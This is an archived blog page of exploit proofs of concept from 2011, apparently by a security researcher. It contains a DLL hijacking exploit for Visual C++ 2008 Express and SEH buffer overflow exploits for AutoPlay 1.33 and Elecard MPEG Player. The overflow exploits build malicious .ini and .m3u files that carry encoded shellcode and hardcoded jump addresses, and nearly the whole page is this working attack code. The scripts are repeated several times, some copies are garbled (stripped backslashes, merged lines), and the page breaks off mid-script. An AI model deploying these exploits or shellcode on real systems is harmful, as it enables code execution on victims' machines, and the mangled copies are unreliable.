Archive | February 2011

Visual C++ 2008 Express Edition (schannel.dll) DLL Hijacking Exploit

/*
Visual C++ 2008 Express Edition (schannel.dll)  DLL Hijacking Exploit

Vendor: Microsoft.
Product Web Page: http://www.microsoft.com/
Affected Version: Visual C++ 2008 Express Edition (x86) 9.0.30729.1 SP

Summary: Microsoft Visual C++ (often abbreviated as MSVC or VC++)
is a commercial, non-free integrated development environment (IDE)
product from Microsoft for the C, C++, and C++/CLI programming
languages. It has tools for developing and debugging C++ code,
especially code written for the Microsoft Windows API, the DirectX API,
and the Microsoft .NET Framework.

Desc: Vulnerable extensions are .inc, .def, .disco, and .dtd
using schannel.dll libraries.

Tested on Microsoft Windows XP Professional SP3 (EN)
Compalied with Visual C++ 2008 Express Edition (x86)

Vulnerability discovered by Dame Jovanoski (badc0re)
Mail:jovanoski@zeroscience.mk

Zero Science Lab – http://www.zeroscience.mk

23.02.2011

*/

#include <windows.h>
int hax0r()
{
MessageBox(0, TEXT(“Hax0r”), TEXT(“DLL Message”), MB_OK);
return 0;
}

BOOL WINAPI DllMain (HANDLE hinstDLL, DWORD fdwReason, LPVOID lpvReserved)
{

switch (fdwReason)
{
case DLL_PROCESS_ATTACH:
hax0r();
case DLL_THREAD_ATTACH:
case DLL_THREAD_DETACH:
case DLL_PROCESS_DETACH:
break;
}

return TRUE;
}

#Auto_Play 1.33 Buffer Overflow(SEH) Local Exploit Autoplay script .ini file
#By badc0re(Dame Jovanoski)
#
from struct import *
import time
f=open(“AutoPlay.ini”,”w”)
shell=(“x29xc9x83xe9xdexd9xeexd9x74x24xf4x5bx81x73x13x61”
“x28x38x56x83xebxfcxe2xf4x9dxc0x7cx56x61x28xb3x13”
“x5dxa3x44x53x19x29xd7xddx2ex30xb3x09x41x29xd3x1f”
“xeax1cxb3x57x8fx19xf8xcfxcdxacxf8x22x66xe9xf2x5b”
“x60xeaxd3xa2x5ax7cx1cx52x14xcdxb3x09x45x29xd3x30”
“xeax24x73xddx3ex34x39xbdxeax34xb3x57x8axa1x64x72”
“x65xebx09x96x05xa3x78x66xe4xe8x40x5axeax68x34xdd”
“x11x34x95xddx09x20xd3x5fxeaxa8x88x56x61x28xb3x3e”
“x5dx77x09xa0x01x7exb1xaexe2xe8x43x06x09xd8xb2x52”
“x3ex40xa0xa8xebx26x6fxa9x86x4bx59x3ax02x28x38x56”);head=(“x5bx47x65x6ex65x72x61x6cx5dx0dx0ax54x69x74x6cx65”
“x3dx41x20x73x61x6dx70x6cx65x20x6fx66x20x77x68x61”
“x74x20x41x75x74x6fx50x6cx61x79x20x63x61x6ex20x64”
“x6fx21x0dx0ax49x63x6fx6ex3dx2ex5cx61x75x74x6fx70”
“x6cx61x79x2ex69x63x6fx0dx0ax53x74x61x72x74x75x70”
“x53x6fx75x6ex64x3dx2ex5cx64x72x75x6dx72x6fx6cx6c”
“x2ex77x61x76x0dx0ax45x78x69x74x53x6fx75x6ex64x3d”
“x2ex5cx65x78x70x6cx6fx64x65x2ex77x61x76x0dx0ax4e”
“x75x6dx62x65x72x4fx66x42x75x74x74x6fx6ex73x3dx37”
“x0dx0ax42x61x63x6bx67x72x6fx75x6ex64x42x69x74x6d”
“x61x70x3dx2ex5cx73x70x6cx61x73x68x2ex6ax70x67x0d”
“x0ax4ex75x6dx62x65x72x4fx66x43x6fx6dx62x6fx73x3d”
“x31x0dx0ax0dx0ax5bx42x75x74x74x6fx6ex31x5dx0dx0a”
“x43x6fx6dx6dx61x6ex64x54x79x70x65x3dx31x0dx0ax43”
“x6fx6dx6dx61x6ex64x3dx65x78x70x6cx6fx72x65x72x2e”
“x65x78x65x0dx0ax46x6cx79x62x79x53x6fx75x6ex64x3d”
“x2ex5cx68x6fx76x65x72x73x65x6cx2ex77x61x76x0dx0a”
“x4cx65x66x74x3dx38x33x0dx0ax54x6fx70x3dx31x33x0d”
“x0ax54x65x78x74x43x6fx6cx6fx72x3dx32x35x35x2cx30”
“x2cx30x0dx0ax48x69x67x68x6cx69x67x68x74x43x6fx6c”
“x6fx72x3dx32x35x35x2cx32x35x35x2cx30x0dx0ax43x61”
“x70x74x69x6fx6ex3dx52x75x6ex20x57x69x6ex64x6fx77”
“x73x20x45x78x70x6cx6fx72x65x72x0dx0ax46x6fx6ex74”
“x53x69x7ax65x3dx32x34x0dx0ax46x6fx6ex74x4ex61x6d”
“x65x3d”)
junk=”x41″*32
junk1=”x41″*92
nseh=”xebx06x90x90″
seh=”x62xcex86x7c”#x62xcex86x7c pop pop ret
esp=”x7bx46x86x7c”#x7bx46x86x7c jmp esp
try:
f.write(head+junk+esp+junk1+nseh+seh+shell)
f.close()
print(“File created”)
except:
print(“File cannot be created”)
from struct import *
import timef=open(“default5.m3u”,”w”)
print “Creating expoit.”
#time.sleep(1)
print “Creating explot..”
#time.sleep(1)
print “Creating explot…”
shell=(“x29xc9x83xe9xdexd9xeexd9x74x24xf4x5bx81x73x13x61”
“x28x38x56x83xebxfcxe2xf4x9dxc0x7cx56x61x28xb3x13”
“x5dxa3x44x53x19x29xd7xddx2ex30xb3x09x41x29xd3x1f”
“xeax1cxb3x57x8fx19xf8xcfxcdxacxf8x22x66xe9xf2x5b”
“x60xeaxd3xa2x5ax7cx1cx52x14xcdxb3x09x45x29xd3x30”
“xeax24x73xddx3ex34x39xbdxeax34xb3x57x8axa1x64x72”
“x65xebx09x96x05xa3x78x66xe4xe8x40x5axeax68x34xdd”
“x11x34x95xddx09x20xd3x5fxeaxa8x88x56x61x28xb3x3e”
“x5dx77x09xa0x01x7exb1xaexe2xe8x43x06x09xd8xb2x52”
“x3ex40xa0xa8xebx26x6fxa9x86x4bx59x3ax02x28x38x56″);
head=”#EXTM3Un”
head+=”#EXTINF:153,Artist – songn”
junk1=”x42″*4
nseh=”x43″*4#”xebx0ax90x90″
seh=”x44″*4#”x7ax15xbdx77″#”xebx0ax90x90″
seh1=”x90″*4#77bd157a#”0x00463EB6″
junk=”x41″*19995
nop=”x90″*4
try:
f.write(head+junk1+nseh+seh+shell+junk)
f.close()
print “File created”
except:
print “File cannot be created”

Link

#!/usr/bin/python
#
#
# ElecardDVDPlayer 5.6 Local Buffer Overflow PoC (SEH)
#
#
# Vendor: Elecard Group
# Product web page: http://www.elecard.com
# Affected version: 5.6
#
# Summary: Elecard MPEG Player is a high-quality full-featured multimedia
# player supporting the newest formats, #designed to provide you with
# video and audio playback.
#
# Desc: The program suffers from a buffer overflow (SEH) vulnerability
# when opening playlist file (.m3u), as a result of adding extra
# bytes.
#
# Tested on: Microsoft Windows XP Professional SP3 (English)
#
# Vulnerability discovered by: badc0re (Dame Jovanoski)
#
#
# Advisory ID: ZSL-2011-4998
# Advisory URL: http://zeroscience.mk/en/vulnerabilities/ZSL-2011-4998.php
#
# 23.02.2011
#
# Special Thanks to:
#
# LiquidWorm (the master :P)
# Corelanc0der(great tutorials and forum)
#f=open(“default5.m3u”,”w”)
print “Creating expoit.”
head=”#EXTM3Un”
head+=”#EXTINF:153,Artist – songn”
junk=”x42″*4
nseh=”x43″*4
seh=”x44″*4
seh1=”x90″*4
junk1=”x41″*20165
nop=”x90″*4
try:
f.write(head+junk1+nseh+seh+junk)
f.close()
print “File created”
except:
print “File cannot be created”
#Auto_Play 1.33 Buffer Overflow(SEH) Local Exploit Autoplay script .ini file
#By badc0re(Dame Jovanoski)
#
from struct import *
import time
f=open(“AutoPlay.ini”,”w”)
shell=(“x29xc9x83xe9xdexd9xeexd9x74x24xf4x5bx81x73x13x61”
“x28x38x56x83xebxfcxe2xf4x9dxc0x7cx56x61x28xb3x13”
“x5dxa3x44x53x19x29xd7xddx2ex30xb3x09x41x29xd3x1f”
“xeax1cxb3x57x8fx19xf8xcfxcdxacxf8x22x66xe9xf2x5b”
“x60xeaxd3xa2x5ax7cx1cx52x14xcdxb3x09x45x29xd3x30”
“xeax24x73xddx3ex34x39xbdxeax34xb3x57x8axa1x64x72”
“x65xebx09x96x05xa3x78x66xe4xe8x40x5axeax68x34xdd”
“x11x34x95xddx09x20xd3x5fxeaxa8x88x56x61x28xb3x3e”
“x5dx77x09xa0x01x7exb1xaexe2xe8x43x06x09xd8xb2x52”
“x3ex40xa0xa8xebx26x6fxa9x86x4bx59x3ax02x28x38x56”);head=(“x5bx47x65x6ex65x72x61x6cx5dx0dx0ax54x69x74x6cx65”
“x3dx41x20x73x61x6dx70x6cx65x20x6fx66x20x77x68x61”
“x74x20x41x75x74x6fx50x6cx61x79x20x63x61x6ex20x64”
“x6fx21x0dx0ax49x63x6fx6ex3dx2ex5cx61x75x74x6fx70”
“x6cx61x79x2ex69x63x6fx0dx0ax53x74x61x72x74x75x70”
“x53x6fx75x6ex64x3dx2ex5cx64x72x75x6dx72x6fx6cx6c”
“x2ex77x61x76x0dx0ax45x78x69x74x53x6fx75x6ex64x3d”
“x2ex5cx65x78x70x6cx6fx64x65x2ex77x61x76x0dx0ax4e”
“x75x6dx62x65x72x4fx66x42x75x74x74x6fx6ex73x3dx37”
“x0dx0ax42x61x63x6bx67x72x6fx75x6ex64x42x69x74x6d”
“x61x70x3dx2ex5cx73x70x6cx61x73x68x2ex6ax70x67x0d”
“x0ax4ex75x6dx62x65x72x4fx66x43x6fx6dx62x6fx73x3d”
“x31x0dx0ax0dx0ax5bx42x75x74x74x6fx6ex31x5dx0dx0a”
“x43x6fx6dx6dx61x6ex64x54x79x70x65x3dx31x0dx0ax43”
“x6fx6dx6dx61x6ex64x3dx65x78x70x6cx6fx72x65x72x2e”
“x65x78x65x0dx0ax46x6cx79x62x79x53x6fx75x6ex64x3d”
“x2ex5cx68x6fx76x65x72x73x65x6cx2ex77x61x76x0dx0a”
“x4cx65x66x74x3dx38x33x0dx0ax54x6fx70x3dx31x33x0d”
“x0ax54x65x78x74x43x6fx6cx6fx72x3dx32x35x35x2cx30”
“x2cx30x0dx0ax48x69x67x68x6cx69x67x68x74x43x6fx6c”
“x6fx72x3dx32x35x35x2cx32x35x35x2cx30x0dx0ax43x61”
“x70x74x69x6fx6ex3dx52x75x6ex20x57x69x6ex64x6fx77”
“x73x20x45x78x70x6cx6fx72x65x72x0dx0ax46x6fx6ex74”
“x53x69x7ax65x3dx32x34x0dx0ax46x6fx6ex74x4ex61x6d”
“x65x3d”)
junk=”x41″*32
junk1=”x41″*92
nseh=”xebx06x90x90″
seh=”x62xcex86x7c”#x62xcex86x7c pop pop ret
esp=”x7bx46x86x7c”#x7bx46x86x7c jmp esp
try:
f.write(head+junk+esp+junk1+nseh+seh+shell)
f.close()
print(“File created”)
except:
print(“File cannot be created”)
from struct import *
import timef=open(“default5.m3u”,”w”)
print “Creating expoit.”
#time.sleep(1)
print “Creating explot..”
#time.sleep(1)
print “Creating explot…”
shell=(“x29xc9x83xe9xdexd9xeexd9x74x24xf4x5bx81x73x13x61”
“x28x38x56x83xebxfcxe2xf4x9dxc0x7cx56x61x28xb3x13”
“x5dxa3x44x53x19x29xd7xddx2ex30xb3x09x41x29xd3x1f”
“xeax1cxb3x57x8fx19xf8xcfxcdxacxf8x22x66xe9xf2x5b”
“x60xeaxd3xa2x5ax7cx1cx52x14xcdxb3x09x45x29xd3x30”
“xeax24x73xddx3ex34x39xbdxeax34xb3x57x8axa1x64x72”
“x65xebx09x96x05xa3x78x66xe4xe8x40x5axeax68x34xdd”
“x11x34x95xddx09x20xd3x5fxeaxa8x88x56x61x28xb3x3e”
“x5dx77x09xa0x01x7exb1xaexe2xe8x43x06x09xd8xb2x52”
“x3ex40xa0xa8xebx26x6fxa9x86x4bx59x3ax02x28x38x56″);
head=”#EXTM3Un”
head+=”#EXTINF:153,Artist – songn”
junk1=”x42″*4
nseh=”x43″*4#”xebx0ax90x90″
seh=”x44″*4#”x7ax15xbdx77″#”xebx0ax90x90″
seh1=”x90″*4#77bd157a#”0x00463EB6″
junk=”x41″*19995
nop=”x90″*4
try:
f.write(head+junk1+nseh+seh+shell+junk)
f.close()
print “File created”
except:
print “File cannot be created”

Advertisements

ElecardDVDPlayer Local Buffer Overflow(SEH) PoC


Link

#!/usr/bin/python
#
#
# Elecard MPEG Player 5.7 Local Buffer Overflow PoC (SEH)
#
#
# Vendor: Elecard Group
# Product web page: http://www.elecard.com
# Affected version: 5.7.100629
#
# Summary: Elecard MPEG Player is a high-quality full-featured multimedia
# player supporting the newest formats, designed to provide you with
# video and audio playback.
#
# Desc: The program suffers from a buffer overflow (SEH) vulnerability
# when opening playlist file (.m3u), as a result of adding extra bytes.
#
#
# ———————————————————————
#
# (d08.33c): Access violation – code c0000005 (first chance)
# First chance exceptions are reported before any exception handling.
# This exception may be expected and handled.
# eax=00000104 ebx=000037bb ecx=0000002a edx=00000104 esi=0013c73c edi=0013ffff
# eip=0045563e esp=0013c6c0 ebp=0013cb14 iopl=0         nv up ei pl nz na pe nc
# cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00210206
# *** ERROR: Module load completed but symbols could not be loaded for image00400000
# image00400000+0x5563e:
# 0045563e f3a5            rep movs dword ptr es:[edi],dword ptr [esi]
# Missing image name, possible paged-out or corrupt data.
# Missing image name, possible paged-out or corrupt data.
# Missing image name, possible paged-out or corrupt data.
# 0:000> g
# (d08.33c): Access violation – code c0000005 (first chance)
# First chance exceptions are reported before any exception handling.
# This exception may be expected and handled.
# eax=00000000 ebx=00000000 ecx=44444444 edx=7c9032bc esi=00000000 edi=00000000
# eip=44444444 esp=0013c2f0 ebp=0013c310 iopl=0         nv up ei pl zr na pe nc
# cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00210246
# <Unloaded_i.dll>+0x44444443:
# 44444444 ??              ???
# 0:000> !exchain
# 0013c304: ntdll!RtlConvertUlongToLargeInteger+7e (7c9032bc)
# 0013cb04: <Unloaded_i.dll>+44444443 (44444444)
# Invalid exception stack at 43434343
#
# ———————————————————————
#
#
# Tested on: Microsoft Windows XP Professional SP3 (English)
#
# Vulnerability discovered by: badc0re (Dame Jovanoski)
#
#
# Advisory ID: ZSL-2011-4998
# Advisory URL: http://zeroscience.mk/en/vulnerabilities/ZSL-2011-4998.php
#
# 24.02.2011
#
# Special Thanks to:
#
# LiquidWorm (the master :P)
# Corelanc0der(great tutorials and forum)
#

f=open(“default5.m3u”,”w”)
print “Creating expoit.”
head=”#EXTM3U\n”
head+=”#EXTINF:153,Artist – song\n”
junk=”\x42″*4
nseh=”\x43″*4
seh=”\x44″*4
junk1=”\x41″*20165

try:
f.write(head+junk1+nseh+seh+junk)
f.close()
print “File created”
except:
print “File cannot be created”

#Auto_Play 1.33 Buffer Overflow(SEH) Local Exploit Autoplay script .ini file
#By badc0re(Dame Jovanoski)
#
from struct import *
import time
f=open(“AutoPlay.ini”,”w”)
shell=(“\x29\xc9\x83\xe9\xde\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x61”
“\x28\x38\x56\x83\xeb\xfc\xe2\xf4\x9d\xc0\x7c\x56\x61\x28\xb3\x13”
“\x5d\xa3\x44\x53\x19\x29\xd7\xdd\x2e\x30\xb3\x09\x41\x29\xd3\x1f”
“\xea\x1c\xb3\x57\x8f\x19\xf8\xcf\xcd\xac\xf8\x22\x66\xe9\xf2\x5b”
“\x60\xea\xd3\xa2\x5a\x7c\x1c\x52\x14\xcd\xb3\x09\x45\x29\xd3\x30”
“\xea\x24\x73\xdd\x3e\x34\x39\xbd\xea\x34\xb3\x57\x8a\xa1\x64\x72”
“\x65\xeb\x09\x96\x05\xa3\x78\x66\xe4\xe8\x40\x5a\xea\x68\x34\xdd”
“\x11\x34\x95\xdd\x09\x20\xd3\x5f\xea\xa8\x88\x56\x61\x28\xb3\x3e”
“\x5d\x77\x09\xa0\x01\x7e\xb1\xae\xe2\xe8\x43\x06\x09\xd8\xb2\x52”
“\x3e\x40\xa0\xa8\xeb\x26\x6f\xa9\x86\x4b\x59\x3a\x02\x28\x38\x56”);head=(“\x5b\x47\x65\x6e\x65\x72\x61\x6c\x5d\x0d\x0a\x54\x69\x74\x6c\x65”
“\x3d\x41\x20\x73\x61\x6d\x70\x6c\x65\x20\x6f\x66\x20\x77\x68\x61”
“\x74\x20\x41\x75\x74\x6f\x50\x6c\x61\x79\x20\x63\x61\x6e\x20\x64”
“\x6f\x21\x0d\x0a\x49\x63\x6f\x6e\x3d\x2e\x5c\x61\x75\x74\x6f\x70”
“\x6c\x61\x79\x2e\x69\x63\x6f\x0d\x0a\x53\x74\x61\x72\x74\x75\x70”
“\x53\x6f\x75\x6e\x64\x3d\x2e\x5c\x64\x72\x75\x6d\x72\x6f\x6c\x6c”
“\x2e\x77\x61\x76\x0d\x0a\x45\x78\x69\x74\x53\x6f\x75\x6e\x64\x3d”
“\x2e\x5c\x65\x78\x70\x6c\x6f\x64\x65\x2e\x77\x61\x76\x0d\x0a\x4e”
“\x75\x6d\x62\x65\x72\x4f\x66\x42\x75\x74\x74\x6f\x6e\x73\x3d\x37”
“\x0d\x0a\x42\x61\x63\x6b\x67\x72\x6f\x75\x6e\x64\x42\x69\x74\x6d”
“\x61\x70\x3d\x2e\x5c\x73\x70\x6c\x61\x73\x68\x2e\x6a\x70\x67\x0d”
“\x0a\x4e\x75\x6d\x62\x65\x72\x4f\x66\x43\x6f\x6d\x62\x6f\x73\x3d”
“\x31\x0d\x0a\x0d\x0a\x5b\x42\x75\x74\x74\x6f\x6e\x31\x5d\x0d\x0a”
“\x43\x6f\x6d\x6d\x61\x6e\x64\x54\x79\x70\x65\x3d\x31\x0d\x0a\x43”
“\x6f\x6d\x6d\x61\x6e\x64\x3d\x65\x78\x70\x6c\x6f\x72\x65\x72\x2e”
“\x65\x78\x65\x0d\x0a\x46\x6c\x79\x62\x79\x53\x6f\x75\x6e\x64\x3d”
“\x2e\x5c\x68\x6f\x76\x65\x72\x73\x65\x6c\x2e\x77\x61\x76\x0d\x0a”
“\x4c\x65\x66\x74\x3d\x38\x33\x0d\x0a\x54\x6f\x70\x3d\x31\x33\x0d”
“\x0a\x54\x65\x78\x74\x43\x6f\x6c\x6f\x72\x3d\x32\x35\x35\x2c\x30”
“\x2c\x30\x0d\x0a\x48\x69\x67\x68\x6c\x69\x67\x68\x74\x43\x6f\x6c”
“\x6f\x72\x3d\x32\x35\x35\x2c\x32\x35\x35\x2c\x30\x0d\x0a\x43\x61”
“\x70\x74\x69\x6f\x6e\x3d\x52\x75\x6e\x20\x57\x69\x6e\x64\x6f\x77”
“\x73\x20\x45\x78\x70\x6c\x6f\x72\x65\x72\x0d\x0a\x46\x6f\x6e\x74”
“\x53\x69\x7a\x65\x3d\x32\x34\x0d\x0a\x46\x6f\x6e\x74\x4e\x61\x6d”
“\x65\x3d”)
junk=”\x41″*32
junk1=”\x41″*92
nseh=”\xeb\x06\x90\x90″
seh=”\x62\xce\x86\x7c”#\x62\xce\x86\x7c pop pop ret
esp=”\x7b\x46\x86\x7c”#\x7b\x46\x86\x7c jmp esp
try:
f.write(head+junk+esp+junk1+nseh+seh+shell)
f.close()
print(“File created”)
except:
print(“File cannot be created”)
from struct import *
import timef=open(“default5.m3u”,”w”)
print “Creating expoit.”
#time.sleep(1)
print “Creating explot..”
#time.sleep(1)
print “Creating explot…”
shell=(“\x29\xc9\x83\xe9\xde\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x61”
“\x28\x38\x56\x83\xeb\xfc\xe2\xf4\x9d\xc0\x7c\x56\x61\x28\xb3\x13”
“\x5d\xa3\x44\x53\x19\x29\xd7\xdd\x2e\x30\xb3\x09\x41\x29\xd3\x1f”
“\xea\x1c\xb3\x57\x8f\x19\xf8\xcf\xcd\xac\xf8\x22\x66\xe9\xf2\x5b”
“\x60\xea\xd3\xa2\x5a\x7c\x1c\x52\x14\xcd\xb3\x09\x45\x29\xd3\x30”
“\xea\x24\x73\xdd\x3e\x34\x39\xbd\xea\x34\xb3\x57\x8a\xa1\x64\x72”
“\x65\xeb\x09\x96\x05\xa3\x78\x66\xe4\xe8\x40\x5a\xea\x68\x34\xdd”
“\x11\x34\x95\xdd\x09\x20\xd3\x5f\xea\xa8\x88\x56\x61\x28\xb3\x3e”
“\x5d\x77\x09\xa0\x01\x7e\xb1\xae\xe2\xe8\x43\x06\x09\xd8\xb2\x52”
“\x3e\x40\xa0\xa8\xeb\x26\x6f\xa9\x86\x4b\x59\x3a\x02\x28\x38\x56″);
head=”#EXTM3U\n”
head+=”#EXTINF:153,Artist – song\n”
junk1=”\x42″*4
nseh=”\x43″*4#”\xeb\x0a\x90\x90″
seh=”\x44″*4#”\x7a\x15\xbd\x77″#”\xeb\x0a\x90\x90″
seh1=”\x90″*4#77bd157a#”0x00463EB6″
junk=”\x41″*19995
nop=”\x90″*4
try:
f.write(head+junk1+nseh+seh+shell+junk)
f.close()
print “File created”
except:
print “File cannot be created”

AutoPlay 1.33 Buffer Overflow(SEH) Local Exploit Autoplay .ini file


Link

#AutoPlay 1.33 Buffer Overflow(SEH) Local Exploit Autoplay .ini file
#By badc0re(Dame Jovanoski)
#
from struct import *
import time
f=open(” AutoPlay.ini”,”w”)
shell=(“\x29\xc9\x83\xe9\xde\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x61”
“\x28\x38\x56\x83\xeb\xfc\xe2\xf4\x9d\xc0\x7c\x56\x61\x28\xb3\x13”
“\x5d\xa3\x44\x53\x19\x29\xd7\xdd\x2e\x30\xb3\x09\x41\x29\xd3\x1f”
“\xea\x1c\xb3\x57\x8f\x19\xf8\xcf\xcd\xac\xf8\x22\x66\xe9\xf2\x5b”
“\x60\xea\xd3\xa2\x5a\x7c\x1c\x52\x14\xcd\xb3\x09\x45\x29\xd3\x30”
“\xea\x24\x73\xdd\x3e\x34\x39\xbd\xea\x34\xb3\x57\x8a\xa1\x64\x72”
“\x65\xeb\x09\x96\x05\xa3\x78\x66\xe4\xe8\x40\x5a\xea\x68\x34\xdd”
“\x11\x34\x95\xdd\x09\x20\xd3\x5f\xea\xa8\x88\x56\x61\x28\xb3\x3e”
“\x5d\x77\x09\xa0\x01\x7e\xb1\xae\xe2\xe8\x43\x06\x09\xd8\xb2\x52”
“\x3e\x40\xa0\xa8\xeb\x26\x6f\xa9\x86\x4b\x59\x3a\x02\x28\x38\x56”);head=(“\x5b\x47\x65\x6e\x65\x72\x61\x6c\x5d\x0d\x0a\x54\x69\x74\x6c\x65”
“\x3d\x41\x20\x73\x61\x6d\x70\x6c\x65\x20\x6f\x66\x20\x77\x68\x61”
“\x74\x20\x41\x75\x74\x6f\x50\x6c\x61\x79\x20\x63\x61\x6e\x20\x64”
“\x6f\x21\x0d\x0a\x49\x63\x6f\x6e\x3d\x2e\x5c\x61\x75\x74\x6f\x70”
“\x6c\x61\x79\x2e\x69\x63\x6f\x0d\x0a\x53\x74\x61\x72\x74\x75\x70”
“\x53\x6f\x75\x6e\x64\x3d\x2e\x5c\x64\x72\x75\x6d\x72\x6f\x6c\x6c”
“\x2e\x77\x61\x76\x0d\x0a\x45\x78\x69\x74\x53\x6f\x75\x6e\x64\x3d”
“\x2e\x5c\x65\x78\x70\x6c\x6f\x64\x65\x2e\x77\x61\x76\x0d\x0a\x4e”
“\x75\x6d\x62\x65\x72\x4f\x66\x42\x75\x74\x74\x6f\x6e\x73\x3d\x37”
“\x0d\x0a\x42\x61\x63\x6b\x67\x72\x6f\x75\x6e\x64\x42\x69\x74\x6d”
“\x61\x70\x3d\x2e\x5c\x73\x70\x6c\x61\x73\x68\x2e\x6a\x70\x67\x0d”
“\x0a\x4e\x75\x6d\x62\x65\x72\x4f\x66\x43\x6f\x6d\x62\x6f\x73\x3d”
“\x31\x0d\x0a\x0d\x0a\x5b\x42\x75\x74\x74\x6f\x6e\x31\x5d\x0d\x0a”
“\x43\x6f\x6d\x6d\x61\x6e\x64\x54\x79\x70\x65\x3d\x31\x0d\x0a\x43”
“\x6f\x6d\x6d\x61\x6e\x64\x3d\x65\x78\x70\x6c\x6f\x72\x65\x72\x2e”
“\x65\x78\x65\x0d\x0a\x46\x6c\x79\x62\x79\x53\x6f\x75\x6e\x64\x3d”
“\x2e\x5c\x68\x6f\x76\x65\x72\x73\x65\x6c\x2e\x77\x61\x76\x0d\x0a”
“\x4c\x65\x66\x74\x3d\x38\x33\x0d\x0a\x54\x6f\x70\x3d\x31\x33\x0d”
“\x0a\x54\x65\x78\x74\x43\x6f\x6c\x6f\x72\x3d\x32\x35\x35\x2c\x30”
“\x2c\x30\x0d\x0a\x48\x69\x67\x68\x6c\x69\x67\x68\x74\x43\x6f\x6c”
“\x6f\x72\x3d\x32\x35\x35\x2c\x32\x35\x35\x2c\x30\x0d\x0a\x43\x61”
“\x70\x74\x69\x6f\x6e\x3d\x52\x75\x6e\x20\x57\x69\x6e\x64\x6f\x77”
“\x73\x20\x45\x78\x70\x6c\x6f\x72\x65\x72\x0d\x0a\x46\x6f\x6e\x74”
“\x53\x69\x7a\x65\x3d\x32\x34\x0d\x0a\x46\x6f\x6e\x74\x4e\x61\x6d”
“\x65\x3d”)
junk=”\x41″*32
junk1=”\x41″*92
nseh=”\xeb\x06\x90\x90″
seh=”\x62\xce\x86\x7c”#\x62\xce\x86\x7c pop pop ret
esp=”\x7b\x46\x86\x7c”#\x7b\x46\x86\x7c jmp esp
try:
f.write(head+junk+esp+junk1+nseh+seh+shell)
f.close()
print(“File created”)
except:
print(“File cannot be created”) 

 

#Auto_Play 1.33 Buffer Overflow(SEH) Local Exploit Autoplay script .ini file
#By badc0re(Dame Jovanoski)
#
from struct import *
import time
f=open(“AutoPlay.ini”,”w”)
shell=(“\x29\xc9\x83\xe9\xde\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x61”
“\x28\x38\x56\x83\xeb\xfc\xe2\xf4\x9d\xc0\x7c\x56\x61\x28\xb3\x13”
“\x5d\xa3\x44\x53\x19\x29\xd7\xdd\x2e\x30\xb3\x09\x41\x29\xd3\x1f”
“\xea\x1c\xb3\x57\x8f\x19\xf8\xcf\xcd\xac\xf8\x22\x66\xe9\xf2\x5b”
“\x60\xea\xd3\xa2\x5a\x7c\x1c\x52\x14\xcd\xb3\x09\x45\x29\xd3\x30”
“\xea\x24\x73\xdd\x3e\x34\x39\xbd\xea\x34\xb3\x57\x8a\xa1\x64\x72”
“\x65\xeb\x09\x96\x05\xa3\x78\x66\xe4\xe8\x40\x5a\xea\x68\x34\xdd”
“\x11\x34\x95\xdd\x09\x20\xd3\x5f\xea\xa8\x88\x56\x61\x28\xb3\x3e”
“\x5d\x77\x09\xa0\x01\x7e\xb1\xae\xe2\xe8\x43\x06\x09\xd8\xb2\x52”
“\x3e\x40\xa0\xa8\xeb\x26\x6f\xa9\x86\x4b\x59\x3a\x02\x28\x38\x56”);head=(“\x5b\x47\x65\x6e\x65\x72\x61\x6c\x5d\x0d\x0a\x54\x69\x74\x6c\x65”
“\x3d\x41\x20\x73\x61\x6d\x70\x6c\x65\x20\x6f\x66\x20\x77\x68\x61”
“\x74\x20\x41\x75\x74\x6f\x50\x6c\x61\x79\x20\x63\x61\x6e\x20\x64”
“\x6f\x21\x0d\x0a\x49\x63\x6f\x6e\x3d\x2e\x5c\x61\x75\x74\x6f\x70”
“\x6c\x61\x79\x2e\x69\x63\x6f\x0d\x0a\x53\x74\x61\x72\x74\x75\x70”
“\x53\x6f\x75\x6e\x64\x3d\x2e\x5c\x64\x72\x75\x6d\x72\x6f\x6c\x6c”
“\x2e\x77\x61\x76\x0d\x0a\x45\x78\x69\x74\x53\x6f\x75\x6e\x64\x3d”
“\x2e\x5c\x65\x78\x70\x6c\x6f\x64\x65\x2e\x77\x61\x76\x0d\x0a\x4e”
“\x75\x6d\x62\x65\x72\x4f\x66\x42\x75\x74\x74\x6f\x6e\x73\x3d\x37”
“\x0d\x0a\x42\x61\x63\x6b\x67\x72\x6f\x75\x6e\x64\x42\x69\x74\x6d”
“\x61\x70\x3d\x2e\x5c\x73\x70\x6c\x61\x73\x68\x2e\x6a\x70\x67\x0d”
“\x0a\x4e\x75\x6d\x62\x65\x72\x4f\x66\x43\x6f\x6d\x62\x6f\x73\x3d”
“\x31\x0d\x0a\x0d\x0a\x5b\x42\x75\x74\x74\x6f\x6e\x31\x5d\x0d\x0a”
“\x43\x6f\x6d\x6d\x61\x6e\x64\x54\x79\x70\x65\x3d\x31\x0d\x0a\x43”
“\x6f\x6d\x6d\x61\x6e\x64\x3d\x65\x78\x70\x6c\x6f\x72\x65\x72\x2e”
“\x65\x78\x65\x0d\x0a\x46\x6c\x79\x62\x79\x53\x6f\x75\x6e\x64\x3d”
“\x2e\x5c\x68\x6f\x76\x65\x72\x73\x65\x6c\x2e\x77\x61\x76\x0d\x0a”
“\x4c\x65\x66\x74\x3d\x38\x33\x0d\x0a\x54\x6f\x70\x3d\x31\x33\x0d”
“\x0a\x54\x65\x78\x74\x43\x6f\x6c\x6f\x72\x3d\x32\x35\x35\x2c\x30”
“\x2c\x30\x0d\x0a\x48\x69\x67\x68\x6c\x69\x67\x68\x74\x43\x6f\x6c”
“\x6f\x72\x3d\x32\x35\x35\x2c\x32\x35\x35\x2c\x30\x0d\x0a\x43\x61”
“\x70\x74\x69\x6f\x6e\x3d\x52\x75\x6e\x20\x57\x69\x6e\x64\x6f\x77”
“\x73\x20\x45\x78\x70\x6c\x6f\x72\x65\x72\x0d\x0a\x46\x6f\x6e\x74”
“\x53\x69\x7a\x65\x3d\x32\x34\x0d\x0a\x46\x6f\x6e\x74\x4e\x61\x6d”
“\x65\x3d”)
junk=”\x41″*32
junk1=”\x41″*92
nseh=”\xeb\x06\x90\x90″
seh=”\x62\xce\x86\x7c”#\x62\xce\x86\x7c pop pop ret
esp=”\x7b\x46\x86\x7c”#\x7b\x46\x86\x7c jmp esp
try:
